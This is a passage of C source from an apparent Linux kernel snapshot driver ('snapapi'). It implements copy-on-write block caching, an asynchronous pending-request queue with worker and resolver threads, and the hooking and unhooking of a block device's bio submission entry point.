		s->s_mcblocks = s->s_cblocks - s->s_fcblocks;

	ret = 0;
	if (bppage == 1) {
		insert_into_busy_list(chain, sab);
		goto out_unlock;
	}
	if (blocks_on_page(sab, bppage) == bppage) {
		remove_from_free_list(chain, sab);
		insert_into_busy_list(chain, sab);
		goto out_unlock;
	}
	if (new_page)
		insert_into_free_list(chain, sab);

out_unlock:
	spin_unlock(&chain->lock);
	if (entry_page)
		kunmap(entry_page);
	return ret;
}

/* return number of read bytes or error */
static int sa_cache_read(struct session_struct *s, void *data,
		unsigned long long bno, int mode, unsigned int flags)
{
	struct sa_chain *chain;
	int ret;

	chain = sa_get_blk_chain(s, bno);
	spin_lock(&chain->lock);

	ret = sa_cache_chain_read(s, chain, data, bno, mode, flags);

	spin_unlock(&chain->lock);
	return ret;
}

#if (DEBUG != 0) && (DEBUG_LEVEL & DEBUG_BIO)

#ifdef HAVE_OP_IS_WRITE
#define BIO_RW_RETURN_VALUE unsigned int
#else
#define BIO_RW_RETURN_VALUE unsigned long
#endif

static BIO_RW_RETURN_VALUE get_bio_req_flags(struct bio *bio)
{
#ifdef HAVE_BIO_OPF
	return bio->bi_opf;
#else
	return bio->bi_rw;
#endif
}

static void print_bio(struct bio *bio, char *pref)
{
	sa_warn("%s bio=%p, dev=%x, sector=%llu, bi_flags=%lx"
		" bi_rw=%lx bi_size=%d bi_vcnt=%d bi_io_vec=%p"
		" bi_max_vecs=%d\n", pref, bio,
		bio->bi_bdev ? bio->bi_bdev->bd_dev : -1,
		(unsigned long long)sn_bio_bi_sector(bio), bio->bi_flags,
		get_bio_req_flags(bio), sn_bio_bi_size(bio), bio->bi_vcnt, bio->bi_io_vec,
		bio->bi_max_vecs);
}
#define dump_bio(x, y) print_bio(x, y)
#else
#define dump_bio(x, y)
#endif

#if LINUX_VERSION_CODE < KERNEL_VERSION(2,6,24)
static int sa_cache_bio_end_io(struct bio *bio, unsigned int bytes_done,
                               int err)
{
	if (sn_bio_bi_size(bio)) {
		sa_warn("bio->bi_size is invalid\n");
		dump_bio(bio, "sa_cache_bio_end_io");
		return BIO_EIO_RET_VAL_ERR;
	}

	complete((struct completion *)bio->bi_private);
	return BIO_EIO_RET_VAL_OK;
}
#else
#if LINUX_VERSION_CODE < KERNEL_VERSION(4,6,0)
static void sa_cache_bio_end_io(struct bio *bio, int err)
#else
static void sa_cache_bio_end_io(struct bio *bio)
#endif // LINUX_VERSION_CODE < KERNEL_VERSION(4,6,0)
{
	complete((struct completion *)bio->bi_private);
	return BIO_EIO_RET_VAL_OK;
}
#endif //if LINUX_VERSION_CODE < KERNEL_VERSION(2,6,24)
#if LINUX_VERSION_CODE < KERNEL_VERSION(2,6,24)
static int sa_pending_bio_end_io(struct bio *bio, unsigned int bytes_done,
                               int err)
#elif LINUX_VERSION_CODE < KERNEL_VERSION(4,6,0)
static void sa_pending_bio_end_io(struct bio *bio, int err)
#else
static void sa_pending_bio_end_io(struct bio *bio)
#endif
{
	unsigned long flags;

	struct pending_request *preq = (struct pending_request*)
							bio->bi_private;
	struct pending_queue *pq = preq->pr_queue;
#if LINUX_VERSION_CODE < KERNEL_VERSION(2,6,24)
	if (bio->bi_size) {
		sa_warn("bio->bi_size is invalid\n");
		dump_bio(bio, "sa_pending_bio_end_io");
	}
#endif
	spin_lock_irqsave(&pq->pq_lock, flags);
	if (pq->pq_state != PQ_RUNNING && pq->pq_state != PQ_CLOSED)
		BUG();
	preq->pr_ready++;
	if (preq->pr_ready != preq->pr_count) {
		spin_unlock_irqrestore(&pq->pq_lock, flags);
		return BIO_EIO_RET_VAL_OK;
	}

	/*
	 * All pq_bios are completed, so add request to ready requests
	 * list for later handling in process context.
	 */

	atomic_dec(&pq->pq_notready_req);
	atomic_inc(&pq->pq_ready_req);
	pqueue_add_request(pq, preq);
	spin_unlock_irqrestore(&pq->pq_lock, flags);
	complete(&pq->pq_bio_done);

	return BIO_EIO_RET_VAL_OK;
}

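/*
 * A pending_request is a variable-length record: the header is
 * followed by pr_count pending_read_request slots, one per read bio.
 * GFP_ATOMIC with __GFP_HIGH cleared is used so the allocation cannot
 * sleep yet does not dip into the emergency pools.
 */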
static struct pending_request* alloc_pending_request(int count)
{
	unsigned size = sizeof(struct pending_request) +
			count * sizeof(struct pending_read_request);
	struct pending_request* req;

	req = kmalloc(size, GFP_ATOMIC & ~__GFP_HIGH);
	if (req) {
		memset(req, 0, size);
		req->pr_count = count;
	}
	return req;
}

static struct pending_request* increase_pending_request
			(struct pending_request* oreq, unsigned count)
{
	unsigned ocount = oreq->pr_count;
	unsigned osize = sizeof(struct pending_request) +
			ocount * sizeof(struct pending_read_request);
	unsigned nsize = osize + count * sizeof(struct pending_read_request);
	struct pending_request* nreq;

	nreq = kmalloc(nsize, GFP_ATOMIC & ~__GFP_HIGH);
	if (nreq) {
		memset(nreq, 0, nsize);
		memcpy(nreq, oreq, osize);
		nreq->pr_count = count + ocount;
		kfree(oreq);
	} else {
		nreq = oreq;
	}
	return nreq;
}

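/*
 * Queue an asynchronous copy-on-write read. The request is accounted
 * against the pending queue (throttled by s_blkcache_emmin), each read
 * bio gets sa_pending_bio_end_io as its completion handler, and all
 * bios are submitted. The original write bio, if any, travels with the
 * request and is re-issued by the handler thread once the reads have
 * completed. Returns -EAGAIN when the queue is saturated and -EBADFD
 * when it is already closed.
 */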
static int submit_pending_request(struct session_struct *s,
	struct pending_request *preq, struct bio *wbio)
{
	struct pending_queue *pq = &s->s_pending_queue;
	int ready, not_ready, qstate;
	int ret, i;

	spin_lock_irq(&pq->pq_lock);
	ready = atomic_read(&pq->pq_ready_req);
	not_ready = atomic_read(&pq->pq_notready_req);
	qstate = pq->pq_state;
	BUG_ON(ready < 0);
	BUG_ON(not_ready < 0);
	if (ready + not_ready > s->s_blkcache_emmin) {
		s->s_async_retr++;
		ret = -EAGAIN;
		goto out_err;
	}
	if (qstate != PQ_RUNNING) {
		/* The pending queue seems to have been closed */
		ret = -EBADFD;
		goto out_err;
	}
	atomic_inc(&pq->pq_notready_req);
	spin_unlock_irq(&pq->pq_lock);
	preq->pr_next = NULL;
	preq->pr_wbio = wbio;
	preq->pr_queue = pq;

	for (i = 0; i < preq->pr_count; i++) {
		struct bio *bio = preq->pr_bios[i].rbio;
		bio->bi_private = preq;
		bio->bi_end_io = sa_pending_bio_end_io;
	}

	if (wbio)
		dump_bio(wbio, "sa_cache_block async case write");

	for (i = 0; i < preq->pr_count; i++) {
		struct bio *bio = preq->pr_bios[i].rbio;
		dump_bio(bio, "sa_cache_block async case read");
		sn_submit_bio(READ, bio);
	}
	return 0;

out_err:
	spin_unlock_irq(&pq->pq_lock);
	return ret;
}

static int sa_cache_save_bio(struct session_struct *s, struct bio *bio,
		unsigned long long bno)
{
	unsigned pg_idx;

	if (sn_is_error_bio(bio)) {
		sn_set_mb(s->s_state, SNAP_READING_ERR);
		return 1;
	}
	for (pg_idx = 0; pg_idx < bio->bi_vcnt; pg_idx++) {
		struct bio_vec* bvec;	/* bio_vec of this page */
		unsigned int pg_off;	/* block offset within page */

		bvec = bio->bi_io_vec + pg_idx;
		for (pg_off = 0; pg_off < bvec->bv_len; pg_off += s->s_bsize) {
			if (sa_cache_save(s, page_address(bvec->bv_page) +
					pg_off + bvec->bv_offset, bno++))
				return 1;
		}
	}
	return 0;
}

static void destroy_cached_bio(struct session_struct *s, struct bio *bio)
{
	int i;
	unsigned nr_pages;

	if (!bio)
		return;

	nr_pages = bio->bi_vcnt;
	for (i = 0; i < nr_pages; i++) {
		if (bio->bi_io_vec[i].bv_page) {
			page_cache_release(bio->bi_io_vec[i].bv_page);
			inc_put_pages(s);
		}
	}
	bio_put(bio);
}

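/*
 * Build a read bio of up to nr_pages newly allocated pages starting at
 * block bno. If bio_add_page() rejects a page (queue limits), the bio
 * is returned shorter than requested and the caller issues the rest in
 * further bios. Returns NULL on allocation failure.
 */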
static struct bio* noinline sa_cache_alloc_bio(struct session_struct *s,
		unsigned long long bno, int nr_pages)
{
	struct page *page;
	struct bio *bio;
	int i = 0;

#ifndef HAVE_BIO_ALLOC_2ARGS
	bio = bio_alloc(s->s_bdev, nr_pages, 0, GFP_NOIO);
#else
	bio = bio_alloc(GFP_NOIO, nr_pages);
#endif
	if (!bio)
		goto out;
#ifdef HAVE_BVEC_ITER
	bio->bi_iter.bi_sector = ((sector_t) bno) * s->s_spb;
#else
	bio->bi_sector = ((sector_t) bno) * s->s_spb;
#endif
#ifdef HAVE_BIO_ALLOC_2ARGS
#ifndef HAVE_BIO_SET_DEV
	bio->bi_bdev = s->s_bdev;
#else
	bio_set_dev(bio, s->s_bdev);
#endif
#endif
	for (i = 0; i < nr_pages; i++) {
		page = alloc_page(GFP_NOIO);
		if (!page)
			goto out;
		inc_get_pages(s);
		if (unlikely(!bio_add_page(bio, page, PAGE_SIZE, 0))) {
			page_cache_release(page);
			inc_put_pages(s);
			if (!s->s_mbio || s->s_mbio > i)
				s->s_mbio = i;
			break;
		}
	}

	return bio;
out:
	sa_warn("Memory shortage: pages=%d, i=%d\n", nr_pages, i);
	destroy_cached_bio(s, bio);
	return 0;
}

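/*
 * Read nr_blocks blocks starting at bno into the cache asynchronously.
 * The range is split into bios of at most MAX_RDPAGES pages each; when
 * the allocated bios end up shorter than requested, the pending
 * request array is grown to make room for additional bios. On success
 * the request is handed to the pending queue and *pended is set.
 */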
static int noinline sa_cache_block(struct session_struct *s,
		struct bio *orig_bio, unsigned long long bno,
		unsigned int nr_blocks,	int *pended)
{
	int i, nr_pages, nr_bios, iprs;
	struct pending_request* preq;
	int ret = -ENOMEM;

	nr_pages = ((nr_blocks - 1) / s->s_bppage) + 1;
	nr_bios = ((nr_pages - 1) / MAX_RDPAGES) + 1;

	preq = alloc_pending_request(nr_bios);
	if (preq == NULL)
		goto out;
	iprs = i = 0;
	do {
		unsigned bsize;
		struct pending_request* preq2;
		int count = MAX_RDPAGES < nr_pages ? MAX_RDPAGES : nr_pages;
		preq->pr_bios[i].rbio = sa_cache_alloc_bio(s, bno, count);
		preq->pr_bios[i].rblkno = bno;
		if (!preq->pr_bios[i].rbio)
			goto out;
		bsize = sn_bio_bi_size(preq->pr_bios[i].rbio) >> PAGE_SHIFT;
		bno += bsize * s->s_bppage;
		nr_pages -= bsize;
		dump_bio(preq->pr_bios[i].rbio, "sa_cache_block read ");
		i++;
		if (nr_pages && i == nr_bios) {
			unsigned incr = ((nr_pages - 1) / MAX_RDPAGES) + 1;
			preq2 = increase_pending_request(preq, incr);
			s->s_iprcnt++;
			iprs++;
			if (preq2 == preq) {
				sa_warn("Increase preq failed. inc=%u\n", incr);
				goto out;
			}
			preq = preq2;
			nr_bios = preq->pr_count;
		}
	} while (nr_pages);
	if (iprs > s->s_mipr)
		s->s_mipr = iprs;
	preq->pr_count = i;
	sa_debug(DEBUG_BIO, "Request inited: blocks=%u, bios=%d\n",
							nr_blocks, i);

resubmit:
	ret = submit_pending_request(s, preq, orig_bio);
	if (unlikely(ret == -EAGAIN)) {
		schedule();
		goto resubmit;
	}
	if (unlikely(ret))
		goto out;
	*pended = 1;
	s->s_async_req++;
	return 0;

out:
	destroy_pending_request(s, preq);
	return ret;
}

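/*
 * Handle a write bio for a mapped session: find the first and the last
 * block of the written range that are still marked in the snapshot
 * block map, and schedule an asynchronous copy-on-write read covering
 * that span before the write is allowed to proceed.
 */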
static int noinline sa_cache_bio(struct session_struct *s, struct bio *bio,
								int *pended)
{
	unsigned long long sbno, ebno, i;
	unsigned long long sbno_cow, ebno_cow;
	sector_t start, end; /* relative to part start */

	dump_bio(bio, "sa_cache_bio");
	start = sn_bio_bi_sector(bio) - s->s_pstart;
	if (sn_bio_bi_sector(bio) < s->s_pstart)
		start = 0;
	end = sn_bio_bi_sector(bio) + (sn_bio_bi_size(bio) >> 9) - s->s_pstart;
	if (end > s->s_plen)
		end = s->s_plen;
	sbno = start >> s->s_spbshift;
	ebno = (end + s->s_spb - 1) >> s->s_spbshift;
	sbno_cow = ebno + 1;
	ebno_cow = sbno;
	for (i = sbno; i < ebno; i++) {
		if (is_block_in_map(&s->s_blkmap, i)) {
			sbno_cow = i;
			ebno_cow = i + 1;
			break;
		}
	}
	/* There is no block in the map */
	if (sbno_cow > ebno) {
		*pended = 0;
		return 0;
	}
	for (i = ebno - 1; i > sbno_cow; i--) {
		if (is_block_in_map(&s->s_blkmap, i)){
			ebno_cow = i + 1;
			break;
		}
	}
	if (sa_cache_block(s, bio, sbno_cow, ebno_cow - sbno_cow, pended))
		return 1;
	return 0;
}

static int noinline sa_save_bio_to_cache(struct session_struct *s,
							struct bio *bio)
{
	unsigned int pg_idx;
	unsigned long long bno;
	sector_t start; /* relative to part start */

	start = sn_bio_bi_sector(bio) - s->s_pstart;
	if (sn_bio_bi_sector(bio) < s->s_pstart)
		start = 0;
	bno = start >> s->s_spbshift;

	for (pg_idx = 0; pg_idx < bio->bi_vcnt; pg_idx++) {
		struct bio_vec* bvec;	/* bio_vec of this page */
		unsigned int pg_off;	/* block offset within page */

		bvec = bio->bi_io_vec + pg_idx;
		for (pg_off = 0; pg_off < bvec->bv_len; pg_off += s->s_bsize) {
			if (sa_cache_save(s, page_address(bvec->bv_page) +
					pg_off + bvec->bv_offset, bno++))
				return 1;
		}
	}
	return 0;
}

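/*
 * Wait until we hold the only reference to the session. Note that this
 * returns with sessions_lock held; the callers drop it themselves
 * after updating the session state.
 */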
static void noinline wait_for_users(struct session_struct *s)
{
	spin_lock(&sessions_lock);
	while (!atomic_dec_and_test(&s->s_users)) {
		atomic_inc(&s->s_users);
		spin_unlock(&sessions_lock);
		schedule();
		spin_lock(&sessions_lock);
	}
	atomic_inc(&s->s_users);
}

static int noinline session_handle_bio(struct session_struct *s,
					struct bio *bio, int *pended)
{
	int state;

	state = s->s_state;
	dump_bio(bio, "session_make_request write");
	if (state == SNAP_FREEZING || state == SNAP_FROZEN ||
					state == SNAP_INITINGMAP) {
		if (!delay_bio(s, bio)) {
			*pended = 1;
			return 0;
		}
		sn_set_mb(s->s_state, SNAP_FREEZE_ERR);
		sa_debug(DEBUG_API, "SNAP_FREEZE_ERR s=%p\n", s);
		unregister_make_request(s);
		sn_thaw_bdev(s);
		/* pass the bio to the original handler */
	} else if (state == SNAP_MAPPED) {
		if (!sa_cache_bio(s, bio, pended))
			return 0;
		sn_set_mb(s->s_state, SNAP_READING_ERR);
		sa_debug(DEBUG_API, "SNAP_MAPPED s=%p\n", s);
		unregister_make_request(s);
	} else if (state == SNAP_READINGMAP) {
		*pended = 0;
		if (!sa_save_bio_to_cache(s, bio))
			return 0;
		sn_set_mb(s->s_state, SNAP_READING_ERR);
		sa_debug(DEBUG_API, "SNAP_READINGMAP s=%p\n", s);
		unregister_make_request(s);
	}
	return 1;
}

static void handle_pending_request(struct session_struct *s)
{
	struct pending_queue *pq = &s->s_pending_queue;
	struct pending_request *preq;
	int i;

	spin_lock_irq(&pq->pq_lock);
	preq = pqueue_get_request(pq);
	atomic_dec(&pq->pq_ready_req);
	spin_unlock_irq(&pq->pq_lock);

	BUG_ON(!preq);
	for (i = 0; i < preq->pr_count; i++) {
		struct bio *rbio = preq->pr_bios[i].rbio;
		unsigned long long rblkno = preq->pr_bios[i].rblkno;

		BUG_ON(!rbio);
		if (sa_cache_save_bio(s, rbio, rblkno)) {
			sn_set_mb(s->s_state, SNAP_READING_ERR);
			sa_debug(DEBUG_API, "SNAP_READING_ERR s=%p\n", s);
			unregister_make_request(s);
		}
	}

	if (preq->pr_wbio)
		generic_make_request(preq->pr_wbio);

	destroy_pending_request(s, preq);
}

/*
 * Worker thread that handles pending bios, to avoid blocking in our
 * make_request_fn.
 */
static int pending_req_handler_thread(void *data)
{
	struct session_struct *s = data;
	struct pending_queue *pq =  &s->s_pending_queue;
	atomic_inc(&s->s_users);
#ifdef USE_KERNEL_THREAD
	daemonize("pending_bio%x", s->s_kdev);
#endif
	/*current->flags |= PF_NOFREEZE;*/
	set_user_nice(current, -20);
	spin_lock_irq(&pq->pq_lock);
	BUG_ON(pq->pq_state != PQ_STOPPED);
	pq->pq_state = PQ_RUNNING;
	spin_unlock_irq(&pq->pq_lock);
	/*
	 * complete it, we are running
	 */
	complete(&pq->pq_done);

	while (1) {
#if LINUX_VERSION_CODE < KERNEL_VERSION(2,6,11)
		wait_for_completion(&pq->pq_bio_done);
#else
		if (wait_for_completion_interruptible(&pq->pq_bio_done)) {
			if (!s->s_simulate_freeze)
				snapapi_try_to_freeze();
			continue;
		}
#endif
		if (!atomic_read(&pq->pq_ready_req)) {
			/*
			 * ->pq_bio_done was completed but the queue is empty.
			 * This fake event was generated by the session
			 * unregister routine. We have to wait until all
			 * not-ready pending requests become ready. Once all
			 * pending requests have been handled we may safely
			 * exit.
			 */
			spin_lock_irq(&pq->pq_lock);
			if (pq->pq_state != PQ_CLOSED) {
				sa_debug(DEBUG_API, "close queue notready=%d\n",
						atomic_read(&pq->pq_ready_req));
				pq->pq_state = PQ_CLOSED;
			}
			spin_unlock_irq(&pq->pq_lock);
			goto check_queue;
		}

		handle_pending_request(s);
check_queue:
		if (pq->pq_state == PQ_CLOSED) {
			spin_lock_irq(&pq->pq_lock);
			if (!atomic_read(&pq->pq_notready_req) &&
					!atomic_read(&pq->pq_ready_req)) {
				/* All pending requests were handled */
				spin_unlock_irq(&pq->pq_lock);
				break;
			}
			spin_unlock_irq(&pq->pq_lock);
		}
	}
	pq->pq_state = PQ_STOPPED;
	complete(&pq->pq_done);
	atomic_dec(&s->s_users);
	return 0;
}

static int start_req_handler_thread(struct session_struct *s)
{
	int ret;
#ifndef USE_KERNEL_THREAD
	struct task_struct *th;
	th = kthread_create(pending_req_handler_thread, s, "snapapi_prht");
	if (IS_ERR(th)) {
		ret = PTR_ERR(th);
		sa_debug(DEBUG_API, "Can't create thread err=%d.\n", ret);
		return ret;
	}
	wake_up_process(th);
#else
	ret = kernel_thread(pending_req_handler_thread, s, CLONE_KERNEL);
	if (ret < 0) {
		sa_debug(DEBUG_API, "Can't create thread err=%d.\n", ret);
		return ret;
	}
#endif
	wait_for_completion(&s->s_pending_queue.pq_done);
	return 0;
}

static void stop_req_handler_thread(struct session_struct *s, int wait)
{
	int ready, not_ready, qstate;
	struct pending_queue *pq;

	pq = &s->s_pending_queue;
restart:
	spin_lock_irq(&pq->pq_lock);
	ready = atomic_read(&pq->pq_ready_req);
	not_ready = atomic_read(&pq->pq_notready_req);
	spin_unlock_irq(&pq->pq_lock);
	qstate = pq->pq_state;
	BUG_ON(ready < 0);
	BUG_ON(not_ready < 0);
	if (wait && (ready + not_ready)) {
		schedule();
		goto restart;
	}
	if (qstate != PQ_STOPPED) {
		/* Send a close event to the pending queue and
		 * wait until it has stopped */
		complete(&pq->pq_bio_done);
		wait_for_completion(&pq->pq_done);
		BUG_ON(pq->pq_state != PQ_STOPPED);
	}
}
#ifdef HAVE_BDOPS_SUBMIT_BIO
#ifdef _PRINTK_ADDR
MAKE_REQUEST_RETURN_VALUE (*_sn_blk_mq_submit_bio)(struct bio *) = (BLK_MQ_SUBMIT_BIO_ADDR != 0) ?
        (MAKE_REQUEST_RETURN_VALUE (*)(struct bio *)) (BLK_MQ_SUBMIT_BIO_ADDR + (long long)(((void *)_printk) - (void *)_PRINTK_ADDR)) : NULL;
#elif PRINTK_ADDR
MAKE_REQUEST_RETURN_VALUE (*_sn_blk_mq_submit_bio)(struct bio *) = (BLK_MQ_SUBMIT_BIO_ADDR != 0) ?
        (MAKE_REQUEST_RETURN_VALUE (*)(struct bio *)) (BLK_MQ_SUBMIT_BIO_ADDR + (long long)(((void *)printk) - (void *)PRINTK_ADDR)) : NULL;
#else
#error "Cannot find _printk or printk symbol"
#endif

static MAKE_REQUEST_RETURN_VALUE sn_blk_mq_submit_bio(struct bio *bio)
{
	sn_request_queue *q = sn_bio_queue(bio);

	percpu_ref_get(&q->q_usage_counter);
	return _sn_blk_mq_submit_bio(bio);
}

static make_request_fn *sa_get_make_request_fn(struct session_struct* s)
{
	return s->s_queue_mq_based ? sn_blk_mq_submit_bio : s->s_make_request_fn;
}

#elif defined(HAVE_BLK_MQ_MAKE_REQUEST)
static MAKE_REQUEST_RETURN_VALUE sa_mq_make_request(sn_request_queue *q, struct bio *bio)
{
	percpu_ref_get(&q->q_usage_counter);
	return blk_mq_make_request(q, bio);
}

static make_request_fn *sa_get_make_request_fn(struct session_struct* s)
{
	return s->s_queue_mq_based ? sa_mq_make_request : s->s_make_request_fn;
}
#else
static make_request_fn *sa_get_make_request_fn(struct session_struct* s)
{
	return s->s_make_request_fn;
}
#endif

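/*
 * Our replacement for the device's submit_bio/make_request entry
 * point. Each write bio is offered to every session registered on this
 * queue (or sharing these fops); a session may delay it, route it
 * through the copy-on-write path, or let it pass. Reads, empty bios
 * and bios no session claims fall through to the saved original
 * handler.
 */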
#ifdef HAVE_BDOPS_SUBMIT_BIO
static MAKE_REQUEST_RETURN_VALUE snapapi_ops_submit_bio(struct bio *bio)
{
	sn_request_queue *q = sn_bio_queue(bio);
#else
static MAKE_REQUEST_RETURN_VALUE snapapi_make_request(sn_request_queue *q, struct bio *bio)
{
#endif
	struct session_struct *s;
	make_request_fn *fn;
	int state;
	int pended = 0;

#ifdef HAVE_BDOPS_SUBMIT_BIO
	const struct block_device_operations *fops;
#ifdef HAVE_BIO_BI_BDEV
	fops = bio->bi_bdev->bd_disk->fops;
#else
	fops = bio->bi_disk->fops;
#endif
#endif
	s = NULL;
	fn = NULL;
	while (1) {
		spin_lock(&sessions_lock);
		if (!s)
#ifdef HAVE_BDOPS_SUBMIT_BIO
			s = find_by_fops(fops);
		else
			s = find_by_fops_next(fops, s);
#else
			s = find_by_queue(bio, q);
		else
			s = find_by_queue_next(bio, q, s);
#endif
		if (!s) {
			spin_unlock(&sessions_lock);
			break;
		}
		atomic_inc(&s->s_users);
		spin_unlock(&sessions_lock);
		if (!fn)
			fn = sa_get_make_request_fn(s);

		if (!sn_op_is_write(bio) || !sn_bio_bi_size(bio)) {
			dump_bio(bio, "sesson_make_request read");
			atomic_dec(&s->s_users);
			break;
		}

		if (s->s_request_queue != q)
			goto next_session;

		state = s->s_state;
		if (state == SNAP_FREEZING) /* freeze whole device */
			goto next_session;
		/*
		 * We assume the bio has already been remapped to the whole
		 * disk by generic_make_request(), so the device can't be a
		 * partition here.
		 */
#ifdef HAVE_BIO_SET_DEV
#ifdef HAVE_BI_PARTNO
		if (bio->bi_partno) {
#else
		if (bio->bi_bdev->bd_partno && !bio_flagged(bio, BIO_REMAPPED)) {
#endif
			sa_warn("device bio_dev(%x) is a partition\n", bio_dev(bio));
		}
#else
		if (bio->bi_bdev->bd_contains != bio->bi_bdev) {
			dev_t ddev;
			ddev = bio->bi_bdev->bd_contains ? bio->bi_bdev->bd_contains->bd_dev : 0;
			sa_warn("bi_dev(%x) != bd_contains(%x)\n", bio->bi_bdev->bd_dev, ddev);
		}
#endif
		if (snapapi_is_not_our_bio(s, bio))
			goto next_session;
		session_handle_bio(s, bio, &pended);
		if (pended) {
			/* bio was pended and will be handled asynchronously */
			atomic_dec(&s->s_users);
			return MAKE_REQUEST_EXIT_STATUS;
		}
next_session:
		atomic_dec(&s->s_users);
	}
	if (unlikely(!fn)) {
#ifdef HAVE_BDOPS_SUBMIT_BIO
		fn = fops->submit_bio;
		if (!fn)
			fn = sn_blk_mq_submit_bio;
#else
		fn = q->make_request_fn;
#endif
		if (!fn) {
#ifdef HAVE_BLK_MQ_MAKE_REQUEST
			fn = sa_mq_make_request;
#else
			goto out_err;
#endif
		}
#ifndef HAVE_BDOPS_SUBMIT_BIO
		if (fn == snapapi_make_request)
#else
		if (fn == snapapi_ops_submit_bio)
#endif
			goto out_err;
	}

#ifdef HAVE_BDOPS_SUBMIT_BIO
	return fn(bio);
#else
	return fn(q, bio);
#endif

out_err:
	sn_bio_io_error(bio);
	return MAKE_REQUEST_EXIT_STATUS;
}

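/*
 * Install our bio interception hook on the device queue. If another
 * session already hooked the same queue (or the same fops), its saved
 * original handler is reused; otherwise the original make_request_fn
 * or fops->submit_bio is stashed in the session before being replaced.
 */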
static int register_make_request(struct session_struct * s)
{
	sn_request_queue *q;
	struct list_head *tmp;
	sa_debug(DEBUG_API, "\n");
	q = snapapi_get_dev_queue(s);
	if (!q)
		return 1;
	spin_lock(&sessions_lock);
	list_for_each(tmp, &sessions_list) {
		struct session_struct *tmp_s;
		tmp_s = list_entry(tmp, struct session_struct, s_list);
#ifdef HAVE_BDOPS_SUBMIT_BIO
		if (tmp_s->s_request_queue &&
			s->s_bdev->bd_disk->fops == tmp_s->s_bdev->bd_disk->fops) {
#else
		if (tmp_s->s_request_queue == q) {
#endif
			s->s_request_queue = q;
			s->s_make_request_fn = tmp_s->s_make_request_fn;
			s->s_queue_mq_based = tmp_s->s_queue_mq_based;
			spin_unlock(&sessions_lock);
			sa_debug(DEBUG_API, "Keep queue as is.\n");
			return 0;
		}
	}
	spin_unlock(&sessions_lock);
	s->s_request_queue = q;
#ifndef HAVE_BDOPS_SUBMIT_BIO
	s->s_make_request_fn = q->make_request_fn;
#else
	sa_debug(DEBUG_API, "saving original fops->submit_bio %p in s %p", s->s_bdev->bd_disk->fops->submit_bio, s);
	s->s_make_request_fn = s->s_bdev->bd_disk->fops->submit_bio;
#endif
	if (!s->s_make_request_fn) {
#if !(defined HAVE_BDOPS_SUBMIT_BIO) && !(defined HAVE_BLK_MQ_MAKE_REQUEST)
		sa_warn("s=%p(%x) queue make_request_fn is NULL and blk_mq_make_request is not defined", s, s->s_kdev);
		return 1;
#endif
		sa_debug(DEBUG_API, "s=%p(%x) s_queue_mq_based is 1", s, s->s_kdev);
		s->s_queue_mq_based = 1;
	}
#ifdef HAVE_QUEUE_LOCK_NPTR
	snapapi_lock_dev_queue(&q);
#else
	snapapi_lock_dev_queue(q);
#endif
#ifndef HAVE_BDOPS_SUBMIT_BIO
	q->make_request_fn = snapapi_make_request;
#else
	snapapi_set_submit_bio_fn(s->s_bdev, snapapi_ops_submit_bio);
#endif
#ifdef HAVE_QUEUE_LOCK_NPTR
	snapapi_unlock_dev_queue(&q);
#else
	snapapi_unlock_dev_queue(q);
#endif
	sa_kdebug("OK. kdev=%x:%x, mq=%u.\n", MAJOR(s->s_kdev), MINOR(s->s_kdev), s->s_queue_mq_based);
	return 0;
}

static void unregister_make_request(struct session_struct * s)
{
	sn_request_queue *q;
	struct list_head *tmp;
	sa_debug(DEBUG_API, "s=%p\n", s);

	q = s->s_request_queue;
	if (!q)
		return;

	if (!s->s_make_request_fn && !s->s_queue_mq_based) {
		sa_warn("s=%p(%x) queue s_make_request_fn is NULL for non mq-based session", s, s->s_kdev);
		return;
	}

	spin_lock(&sessions_lock);
	list_for_each(tmp, &sessions_list) {
	struct session_struct *tmp_s;
		tmp_s = list_entry(tmp, struct session_struct, s_list);
#ifdef HAVE_BDOPS_SUBMIT_BIO
		if (tmp_s->s_request_queue && tmp_s != s &&
			s->s_bdev->bd_disk->fops == tmp_s->s_bdev->bd_disk->fops) {
#else
		if (tmp_s->s_request_queue == q && tmp_s != s) {
#endif
			s->s_make_request_fn = 0;
			s->s_request_queue = 0;
			s->s_queue_mq_based = 0;
			spin_unlock(&sessions_lock);
			sa_debug(DEBUG_API, "Keep queue as is. s=%p\n", s);
			return;
		}
	}
	spin_unlock(&sessions_lock);
#ifdef HAVE_QUEUE_LOCK_NPTR
	snapapi_lock_dev_queue(&q);
#else
	snapapi_lock_dev_queue(q);
#endif
#ifndef HAVE_BDOPS_SUBMIT_BIO
	q->make_request_fn = s->s_make_request_fn;
#else
	snapapi_set_submit_bio_fn(s->s_bdev, s->s_make_request_fn);
#endif
#ifdef HAVE_QUEUE_LOCK_NPTR
	snapapi_unlock_dev_queue(&q);
#else
	snapapi_unlock_dev_queue(q);
#endif
	s->s_make_request_fn = NULL;
	s->s_queue_mq_based = 0;
	s->s_request_queue = 0;
	sa_debug(DEBUG_API, "make_request deinstalled OK. s=%p\n", s);
	return;
}

static int do_resolver(void)
{
	struct session_struct *s;
	sa_debug(DEBUG_API, "\n");

	spin_lock(&sessions_lock);
	s = find_deadlocked();
	if (!s) {
		spin_unlock(&sessions_lock);
		return 0;
	}
	atomic_inc(&s->s_users);
	spin_unlock(&sessions_lock);

	sn_set_mb(s->s_state, SNAP_FREEZE_ERR);
	unregister_make_request(s);
	sa_info("Real cleanup started... s=%p(%x)", s, s->s_kdev);
	sn_thaw_bdev(s);
	cleanup_biolist(s);
	atomic_dec(&s->s_users);
	return 1;
}

#ifndef USE_KERNEL_THREAD
#ifndef HAVE_COMPLETE_AND_EXIT
#define complete_and_exit kthread_complete_and_exit
#endif /* complete_and_exit */
static int resolver_loop(void *flag)
{
	sa_debug(DEBUG_API, "\n");

	while (1) {
		snapapi_try_to_freeze();
		set_current_state(TASK_INTERRUPTIBLE);
		if (!resolver_thread_continue)
			break;

		schedule();
		if (resolver_thread_continue)
			while (do_resolver())
				;
		else
			break;
		if (signal_pending(current))
			flush_signals(current);
	}
	sa_debug(DEBUG_API, "exiting\n");
	complete_and_exit(&resolver_thread_exited, 0);
}
#else
static int resolver_loop(void *flag)
{
	sa_debug(DEBUG_API, "\n");
	lock_kernel();
	init_waitqueue_head(&resolver_thread_signal);
	daemonize("snapapid");
	allow_signal(SIGKILL);
	while (resolver_thread_continue) {
		interruptible_sleep_on_timeout(&resolver_thread_signal,
							MAX_SCHEDULE_TIMEOUT);
		if (resolver_thread_continue)
			do_resolver();
		else
			break;
		if (signal_pending(current))
			flush_signals(current);
	}
	unlock_kernel();
	sa_debug(DEBUG_API, "exiting\n");
	complete_and_exit(&resolver_thread_exited, 0);
}
#endif
#ifdef HAVE_INIT_TIMER
static void heartbeat_timer_func(unsigned long __data)
#else
static void heartbeat_timer_func(struct timer_list *t)
